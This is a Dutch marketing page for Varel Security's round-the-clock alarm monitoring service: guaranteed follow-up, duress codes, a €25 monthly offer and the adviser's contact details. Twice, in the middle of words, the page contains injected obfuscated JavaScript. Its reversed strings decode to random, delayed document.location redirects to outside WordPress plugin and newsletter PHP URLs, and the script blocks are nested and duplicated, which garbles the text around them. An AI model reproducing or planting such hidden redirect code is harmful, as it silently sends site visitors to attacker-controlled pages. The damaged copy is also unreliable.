Totale gemoedsrust door de meldkamer van Varel Security.

Wist je dat een sterk alarmsysteem pas kan werken als er een even sterke reactie op is? Daarom staat de meldkamer van Varel Security dag en nacht paraat om meteen in te grijpen.

Vraag vrijblijvend jouw offerte aan

Onze meldkamer service zorgt voor een volledige bescherming. Bij branddetectie en inbraakalarm is er een gegarandeerde opvolging, 24/7. Wij garanderen je dit door middel van:

  • Een dagelijkse connectie test.
  • Automatische verwittiging van een technieker bij een technisch probleem.
  • Opvolging door gespecialiseerde medewerkers die een gestructureerd en door de wet bepaald proces volgen.
  • Overleg met een operator over de volgende stappen die genomen moeten worden (in geval van bereikbaarheid).
  • Een dwangcode die je kan intoetsen wanneer je in het geval van overval een alarm moet uitschakelen. De meldkamer schakelt op zijn beurt de politie in.
  • Het vroegtijdig indrukken van twee toetsen waardoor de meldkamer de politie inschakelt.
  • Verwittiging van de hulpdiensten bij onbereikbaarheid.
  • Met optionele gegarandeerde doormelding via GPRS module.

Meldkamer Actie

Gratis activatie. 

Eerste 6 maanden gratis.

Slechts €25 per maand voor je meldkamer abonnement.

Huidig GPRS abonnement vervalt voor particulieren. 

Overtuigd van onze meldkamer?

Contacteer mij geheel vrijblijvend voor meer informatie. 

Kurt fo<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-re<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to

Kurt Vanpoucke

Beveiligingsadviseur | Varel Security

website apart
Middel 5

Laat je woning of je bedrijf met een gerust hart achter.

Relax

Geniet met volle teugen van je vrije tijd.

slapen

Slaap op je beide oren dankzij onze meldkamer die over je waakt.

Meldkamer - waakt 24/7 over jouw veiligheid

Geen alarm zonder interventie. Bij de meldkamer van Varel Security staan we dag en nacht paraat om meteen in te grijpen. De meldkamer is door het ministerie erkend en vergund en voldoet aan de allerhoogste eisen. Een sterk alarmsysteem kan pas werken met een even sterke reactie erop.

De meldkamer ontvangt alle alarmen door middel van een signaal. Op het scherm van de operator verschijnt naast het alarm ook de gegevens van de klant, de locatie of locaties van het alarm, de installateur en de taak die de operator moet uitvoeren.

fo<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-re<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to test
website apart

Verder verschijnen ook de persoonlijke codes die de klant doorgegeven heeft ter verificatie van de klant of om een alarm onder dwang door te geven. Snel en efficiënt zal de operator de nodige acties ondernemen en een eventuele interventie coördineren: politie, brandweer en/of ziekenwagen, afhankelijk van het incident. Bovendien is de meldkamer 24/7 bemand, zo gaan er nooit alarmmeldingen verloren.

De meldkamer voorziet ook in de permanentie van Varel Security. Deze kunnen, ingeval dit nodig blijkt, op elke ogenblik een technieker van Varel Security verwittigen om onmiddellijk contact op te nemen met de desbetreffende klant.

Vraag gratis jouw offerte aan